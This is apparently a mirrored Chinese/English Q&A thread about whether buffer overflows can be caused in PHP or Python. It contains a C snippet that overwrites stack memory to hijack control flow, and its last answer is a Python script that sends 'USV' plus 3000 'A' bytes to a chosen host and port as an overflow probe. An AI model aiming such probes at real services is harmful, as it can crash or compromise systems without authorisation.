如何在 PHP/Python 中进行缓冲区溢出?

发布于 2024-08-17 18:52:31 字数 254 浏览 14 评论 0原文

这是c中的一个例子:

#include <stdio.h>
#include <string.h>

void bad() {
    printf("Oh shit really bad~!\r\n");
}

void foo() {
    char overme[4] = "WOW";
    *(int*)(overme+8) = (int)bad;
}

int main() {
   foo();
}

Here is an example in c:

#include <stdio.h>
#include <string.h>

void bad() {
    printf("Oh shit really bad~!\r\n");
}

void foo() {
    char overme[4] = "WOW";
    *(int*)(overme+8) = (int)bad;
}

int main() {
   foo();
}

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(6

掩耳倾听 2024-08-24 18:52:31

Python 和 PHP 按照其他人建议的方式进行解释这一事实实际上并不是重点。关键是,它们公开的几乎所有 API 和语言语义都经过严格的错误检查,因此不可能出现可利用的未定义行为。即使你编译了语言,那也是不可能的。这并不意味着您不能公开可以执行任何操作的不安全 API。事实上,使用 Python 的 ctypes 模块,应该可以创建类似的行为,但意外地做到这一点要困难得多。

The fact that Python and PHP are interpreted like suggested by others isn't actually the point. The point is that almost all of the APIs and language semantics that they expose are heavily error-checked making it impossible to have exploitable undefined behavior. Even if you compile the languages, it would still be impossible. This doesn't mean that you couldn't expose unsafe APIs that can do whatever. In fact, using Pythons ctypes module, it should be possible to create a similar behavior, but significantly harder to do so by accident.

埋情葬爱 2024-08-24 18:52:31

由于 PHP 是一种脚本语言,没有指针,并且字符串类型是二进制安全的,因此这些东西在 PHP 中不起作用。

但你为什么要做这样的事呢?

(哦,PHP 中可能存在导致缓冲区溢出的错误,但这不是任何可以依赖的东西,而且通常很快就能修复......)

As PHP is a scripting language and has no pointers and the string type is binary-safe such things won't work in PHP.

But why would you want to do such a thing?

(oh, there might be bugs in PHP resulting in a buffer overflow, but that's nothing that canbe relied upon in any way and usually is fixed quite ffast...)

紙鸢 2024-08-24 18:52:31

很抱歉:您遇到了 Python 的弱点。不幸的是,这是设计使然,所以我们对此无能为力。也许你应该选择 C。

正如 Martin v. Löwis 所说

抱歉,Python 不支持缓冲区溢出。

PS 哇。好像几个月前我就读过那篇文章,但现在已经过去七年零一天了。

We're sorry: you've reached a weakness in Python. Unfortunately, it's by design, so little can be done about it. Perhaps you should stay with C.

As Martin v. Löwis said:

Python does not support buffer overflows, sorry.

PS Wow. It seems like a few months ago that I read that post, and yet it's been 7 years and a day.

眼眸里的那抹悲凉 2024-08-24 18:52:31

在 PHP 中做类似的事情不会导致相同的行为。

PHP 被解释并始终检查您正在执行的操作是否有效。因此您不能 - 例如 - 溢出缓冲区。

Doing something similar in PHP will not result in the same behavior.

PHP is interpreted and always checks whether the operation you are doing or not is valid.. So you can't - for example - overrun a buffer.

空‖城人不在 2024-08-24 18:52:31

因为 php、python 和每种解释性语言首先必须通过解释器,并且您没有对内存的完全访问权限,所以这种语言不会让您做某些类型的游戏,例如您发布的代码。

Because php,python and every interpreted language first have to go through an interpreter and you dont have the full access to the memory this kind of languages will not let you to do some kind of games like the code you posted.

欲拥i 2024-08-24 18:52:31
import sys
import socket

for carg in sys.argv:

    if carg == "-S":

        argnum= sys.argv.index(carg)

        argnum +=1

        host = sys.argv[argnum]

    elif carg == "-p":

        argnum = sys.argv.index(carg)

        argnum +=1

        port = sys.argv[argnum]

buffer = "\x41"* 3000

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send("USV" + buffer)

s.close()
import sys
import socket

for carg in sys.argv:

    if carg == "-S":

        argnum= sys.argv.index(carg)

        argnum +=1

        host = sys.argv[argnum]

    elif carg == "-p":

        argnum = sys.argv.index(carg)

        argnum +=1

        port = sys.argv[argnum]

buffer = "\x41"* 3000

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send("USV" + buffer)

s.close()
~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文